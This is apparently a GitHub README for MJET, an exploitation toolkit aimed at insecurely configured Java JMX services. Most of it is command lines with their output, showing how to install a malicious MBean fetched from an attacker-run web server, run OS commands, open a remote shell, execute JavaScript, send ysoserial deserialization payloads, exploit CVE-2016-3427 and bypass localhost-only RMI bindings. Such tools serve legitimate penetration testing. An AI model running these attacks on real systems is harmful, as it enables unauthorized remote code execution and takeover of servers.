Skip to content
master
Switch branches/tags
Code
This branch is 12 commits ahead, 4 commits behind siberas:master.
Contribute

MJET by MOGWAI LABS

MOGWAI LABS JMX Exploitation Toolkit

MJET is a fork of sjet, which was developed by siberas but is no longer actively maintained. MJET is maintained by the MOGWAI LABS team which also provided most of the original sjet codebase.

MJET allows an easy exploitation of insecure configured JMX services. Additional background information can be found here and here.

Prerequisites

Usage

MJET implements a CLI interface (using argparse):

jython mjet.py targetHost targetPort MODE password (modeOptions)

Where

  • targetHost - the target IP address
  • targetPort - the target port where JMX is running
  • MODE - the script mode
  • modeOptions - the options for the mode selected

Authentication support (if JMX authentication is enabled):

  • --jmxrole - the username
  • --jmxpassword - the password

Other optional arguments:

  • --jmxmp - Use JMX-MP (requires to load an additional JAR)
  • --localhost_bypass - service port for the proxy in localhost bypass
  • --shell - Use defined shell
  • --rmiObjectName - RMI name of the JMX endpoint

Modes and modeOptions

  • install - installs the payload in the current target
    • password - the password that should be set after successful installation
    • payload_url - full URL to load the payload
    • payload_port - port to load the payload
  • uninstall - uninstalls the payload from the current target
  • changepw - change the password on a already deployed payload
    • password - the password to access the installed MBean
    • newpass - The new password
  • command - runs the command CMD in the targetHost
    • password - the password to access the installed MBean
    • CMD - the command to run
  • shell - starts a simple shell in targetHost (with the limitations of java's Runtime.exec())
    • password - the password to access the installed MBean
  • javascript - runs a javascript file FILENAME in the targetHost
    • password - the password to access the installed MBean
    • FILENAME - the javascript to be run
  • deserialize - send a ysoserial payload to the target
    • gadget - gadget as provided by ysoserial, e.g., CommonsCollections6
    • cmd - command to be executed
  • webserver - just run the MLET web server
    • payload_url - full URL to load the payload
    • payload_port - port to load the payload

Examples

Installing the payload MBean on a vulnerable JMX service

In the following example, the vulnerable JMX service runs on 10.165.188.23 port 2222, the attacker has the IP address 10.165.188.1. The JMX service will connect to the web service of the attacker to download the payload jar file. MJET will start the necessary web service on port 8000.

After the successful installation of the MBean, the default password is changed to the password that was provided at the command line ("super_secret").

h0ng10@rocksteady ~/w/mjet> java -jar jython-standalone-2.7.0.jar mjet.py 10.165.188.23 2222 install super_secret http://10.165.188.1:8000 8000

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.165.188.23:2222/jmxrmi
[+] Connected: rmi://10.165.188.1  1
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://10.165.188.1:8000
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
10.165.188.23 - - [26/Apr/2019 21:50:37] "GET / HTTP/1.1" 200 -
[+] Successfully loaded MBeanMogwaiLabs:name=payload,id=1
[+] Changing default password...
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Successfully changed password
[+] Done
h0ng10@rocksteady ~/w/mjet> 

Installation with JMX credentials (also needs a weak configuration of the server):

h0ng10@rocksteady:~/mjet$ jython mjet.py 192.168.11.136 9991 install super_secret http://192.168.11.132:8000 8000 --jmxrole JMXUSER --jmxpassword JMXPASSWORD
mJET - MOGWAI LABS JMX Exploitation Toolkit
=======================================
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Using credentials: JMXUSER / JMXPASSWORD
[+] Connected: rmi://192.168.11.132  1
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.11.132:8000
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
192.168.11.136 - - [22/Aug/2017 22:38:00] "GET / HTTP/1.1" 200 -
192.168.11.136 - - [22/Aug/2017 22:38:00] "GET /mogwailabs_mlet.jar HTTP/1.1" 200 -
[+] Successfully loaded MBeanMogwaiLabs:name=payload,id=1
[+] Changing default password...
[+] Loaded de.mogwailabs.mlet.MogwaiLabsPayload
[+] Successfully changed password

h0ng10@rocksteady:~/mjet$

Running the command 'ls -la' in a Linux target:

After the payload was installed, we can use it to execute OS commands on the target.

h0ng10@rocksteady ~/w/mjet> jython mjet.py 10.165.188.23 2222 command super_secret "ls -la"

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.165.188.23:2222/jmxrmi
[+] Connected: rmi://10.165.188.1  4
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Executing command: ls -la
total 20
drwxr-xr-x  5 root    root    4096 Apr 26 11:12 .
drwxr-xr-x 33 root    root    4096 Apr 10 13:54 ..
lrwxrwxrwx  1 root    root      12 Aug 13  2018 conf -> /etc/tomcat8
drwxr-xr-x  2 tomcat8 tomcat8 4096 Aug 13  2018 lib
lrwxrwxrwx  1 root    root      17 Aug 13  2018 logs -> ../../log/tomcat8
drwxr-xr-x  2 root    root    4096 Apr 26 11:12 policy
drwxrwxr-x  3 tomcat8 tomcat8 4096 Apr 10 13:54 webapps
lrwxrwxrwx  1 root    root      19 Aug 13  2018 work -> ../../cache/tomcat8


[+] Done
h0ng10@rocksteady ~/w/mjet>

Running in shell mode

If you don't want to load Java for every command, you can use the "shell mode" to get a limited command shell.

h0ng10@rocksteady ~/w/mjet> jython mjet.py 10.165.188.23 2222 shell super_secret 

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.165.188.23:2222/jmxrmi
[+] Connected: rmi://10.165.188.1  5
[+] Use command 'exit_shell' to exit the shell
>>> ls -la
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Executing command: ls -la
total 20
drwxr-xr-x  5 root    root    4096 Apr 26 11:12 .
drwxr-xr-x 33 root    root    4096 Apr 10 13:54 ..
lrwxrwxrwx  1 root    root      12 Aug 13  2018 conf -> /etc/tomcat8
drwxr-xr-x  2 tomcat8 tomcat8 4096 Aug 13  2018 lib
lrwxrwxrwx  1 root    root      17 Aug 13  2018 logs -> ../../log/tomcat8
drwxr-xr-x  2 root    root    4096 Apr 26 11:12 policy
drwxrwxr-x  3 tomcat8 tomcat8 4096 Apr 10 13:54 webapps
lrwxrwxrwx  1 root    root      19 Aug 13  2018 work -> ../../cache/tomcat8


>>> pwd
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Executing command: pwd
/var/lib/tomcat8


>>> exit_shell
[+] Done
h0ng10@rocksteady ~/w/mjet> 

Invoke a JavaScript payload on a target:

The example script "javaproperties.js" displays the Java properties of the vulnerable service. It can be invoked as follows:

h0ng10@rocksteady ~/w/mjet> jython mjet.py 10.165.188.23 2222 javascript super_secret scripts/javaproperties.js 

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.165.188.23:2222/jmxrmi
[+] Connected: rmi://10.165.188.1  6
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Executing script
awt.toolkit=sun.awt.X11.XToolkit
java.specification.version=11
sun.cpu.isalist=
sun.jnu.encoding=UTF-8
java.class.path=/usr/share/tomcat8/bin/bootstrap.jar:/usr/share/tomcat8/bin/tomcat-juli.jar
com.sun.management.jmxremote.authenticate=false
java.vm.vendor=Oracle Corporation
sun.arch.data.model=64
...


[+] Done

Change the password

Change the existing password ("super_secret") to "this-is-the-new-password":

h0ng10@rocksteady ~/w/mjet> jython mjet.py 10.165.188.23 2222 changepw super_secret this-is-the-new-password

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.165.188.23:2222/jmxrmi
[+] Connected: rmi://10.165.188.1  7
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Successfully changed password
[+] Done

Uninstall the payload MBean from the target

Uninstall the payload MBean 'MogwaiLabs' from the target:

h0ng10@rocksteady ~/w/mjet> jython mjet.py 10.165.188.23 2222 uninstall

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.165.188.23:2222/jmxrmi
[+] Connected: rmi://10.165.188.1  8
[+] MBean correctly uninstalled
[+] Done

Exploit Java deserialization with ysoserial

Exploit Java deserialization with ysoserial on target: The file ysoserial.jar must be present in the MJET directory. You can select any ysoserial payload as you like, similar to the original ysoserial calls.

This attack even works if JMX authentication is enabled and the user has "readonly" permissions.

h0ng10@rocksteady ~/w/mjet> jython mjet.py --jmxrole user --jmxpassword userpassword 10.165.188.23 2222 deserialize CommonsCollections6 "touch /tmp/xxx"

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Added ysoserial API capacities
[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.165.188.23:2222/jmxrmi
[+] Using credentials: user / userpassword
[+] Connected: rmi://10.165.188.1 user 21
[+] Loaded sun.management.ManagementFactoryHelper$PlatformLoggingImpl
[+] Passing ysoserial object as parameter to getLoggerLevel(String loglevel)
[+] Got an access denied exception - this is expected

[+] Done

Exploit CVE-2016-3427: JMX authentication with Java deserialization

Exploit CVE-2016-3427 with ysoserial: The file ysoserial.jar must be present in the MJET/jar directory. You can select any ysoserial payload as you like, similar to the original ysoserial calls.

$ java -jar jython.jar mjet.py 127.0.0.1 9999 cve-2016-3427 CommonsCollections6 "touch /tmp/xxx"

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Added ysoserial API capacities
[+] Using JMX RMI
[+] Connecting to: service:jmx:rmi:///jndi/rmi://127.0.0.1:9999/jmxrmi
[+] Object was deserialized, target could be vulnerable
[?]: Returned error:
(<type 'java.lang.SecurityException'>, java.lang.SecurityException: Authentication failed! Credentials should be String[] instead of java.util.HashSet, <traceback object at 0x2>)
[+] Done

Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3427

Webserver only mode

It is also possible to just run the web server that provides the MLET code and the JAR file with the payload MBean

h0ng10@rocksteady ~/w/mjet> jython mjet.py 10.165.188.23 2222 webserver http:/xxxx/xxxx 8000

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Starting webserver at port 8000
[+] Press Enter to stop the service

JMX message protocol (JMXMP) support

Download opendmk_jmxremote_optional_jar-1.0-b01-ea.jar and move it into the jars directory. You need to add this directory to the classpath via java -cp.

java -cp "jython.jar:jars/*" org.python.util.jython mjet.py shell mypass

Localhost bypass

It sometimes happens that the RMI registry exposes a RemoteObject that is only accessible on localhost (example @127.0.0.1:45401). However, the port is open where the RemoteObject is accessible over the network.

$ nmap -sVC 172.17.0.2 -p 9999,45401

Starting Nmap 7.60 ( https://nmap.org ) at 2020-03-24 16:48 CET
Nmap scan report for 172.17.0.2
Host is up (0.00035s latency).

PORT      STATE SERVICE     VERSION
9999/tcp  open  java-rmi    Java RMI Registry
| rmi-dumpregistry: 
|   jmxrmi
|      implements javax.management.remote.rmi.RMIServer, 
|     extends
|       java.lang.reflect.Proxy
|       fields
|           Ljava/lang/reflect/InvocationHandler; h
|             java.rmi.server.RemoteObjectInvocationHandler
|             @127.0.0.1:45401
|             extends
|_              java.rmi.server.RemoteObject
45401/tcp open  rmiregistry Java RMI

It is still possible to exploit this service by using the --localhost_bypass <PORT> option. In the following example, we use port 45401. This will start a TCP proxy on localhost and forward the traffic to the targetHost on the supplied port.

$ jython mjet.py --localhost_bypass 45401 172.17.0.2 9999 install mypass http://172.17.0.1:6666 6666

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Starting webserver at port 6666
[+] Using JMX RMI
[+] Connecting to: service:jmx:rmi:///jndi/rmi://172.17.0.2:9999/jmxrmi
[+] Started localhost proxy on port 45401
[+] Connected: rmi://172.17.0.1  17
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://172.17.0.1:6666
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
172.17.0.2 - - [24/Mar/2020 18:07:01] "GET / HTTP/1.1" 200 -
[+] Successfully loaded MBeanMogwaiLabs:name=payload,id=1
[+] Changing default password...
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Successfully changed password
[+] Done

Custom RMI Object Name

Sometimes it happens that the RMI object name of the JMX endpoint is not jmxrmi, in this case the parameter --rmiObjectName can be used to specify the appropriate RMI object name, for example --rmiObjectName=customJmxRmi.

$ jython mjet.py --rmiObjectName=customJmxRmi 172.17.0.2 2222 super_secret install http://172.17.0.1:8000 8000

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.165.188.23:2222/customJmxRmi
[+] Connected: rmi://10.165.188.1  1
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://10.165.188.1:8000
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
10.165.188.23 - - [26/Apr/2019 21:50:37] "GET / HTTP/1.1" 200 -
[+] Successfully loaded MBeanMogwaiLabs:name=payload,id=1
[+] Changing default password...
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Successfully changed password
[+] Done
$  

Using own defined Shell

Sometimes it happens that the target system does not provide a /bin/bash or cmd.exe shell. In this case the optional parameter --shell can be specified, for example --shell="bash -c". By executing the javascript javaproperties.js with mjet.py, more details about the environment are given.

$ jython mjet.py --shell="bash -c" 10.165.188.23 2222 command super_secret "ls -la"

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.165.188.23:2222/jmxrmi
[+] Connected: rmi://10.165.188.1  4
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Executing command: ls -la
total 20
drwxr-xr-x  5 root    root    4096 Apr 26 11:12 .
drwxr-xr-x 33 root    root    4096 Apr 10 13:54 ..
lrwxrwxrwx  1 root    root      12 Aug 13  2018 conf -> /etc/tomcat8
drwxr-xr-x  2 tomcat8 tomcat8 4096 Aug 13  2018 lib
lrwxrwxrwx  1 root    root      17 Aug 13  2018 logs -> ../../log/tomcat8
drwxr-xr-x  2 root    root    4096 Apr 26 11:12 policy
drwxrwxr-x  3 tomcat8 tomcat8 4096 Apr 10 13:54 webapps
lrwxrwxrwx  1 root    root      19 Aug 13  2018 work -> ../../cache/tomcat8


[+] Done
$

Reference: https://www.optiv.com/blog/exploiting-jmx-rmi

Docker

Build and run the docker image

# Build
docker build -t mjet .
# Run Help
docker run mjet
# Exploit example
docker run mjet 10.165.188.23 2222 install super_secret http://10.165.188.1:8000 8000
# Run Interactive into shell
docker run --entrypoint /bin/sh -it mjet

By default the docker image exposes port 8000 for the HTTP server. If you need another port you need to remember to expose it!

Contributing

Feel free to contribute.

Authors

  • Hans-Martin Münch - Initial idea and work - h0ng10
  • Patricio Reller - CLI and extra options - preller
  • Ben Campbell - Several improvements - Meatballs1
  • Arnim Rupp - Authentication support
  • Sebastian Kindler - Deserialization support
  • Karsten Zeides - JMX Message Protocol support, localhost bypass zeides
  • g60ocR - Docker file g60ocR
  • Morn98 - Shell and RMI selection Morn98)

See also the list of contributors who participated in this project.

License

This project is licensed under the MIT License - see the LICENSE file for details.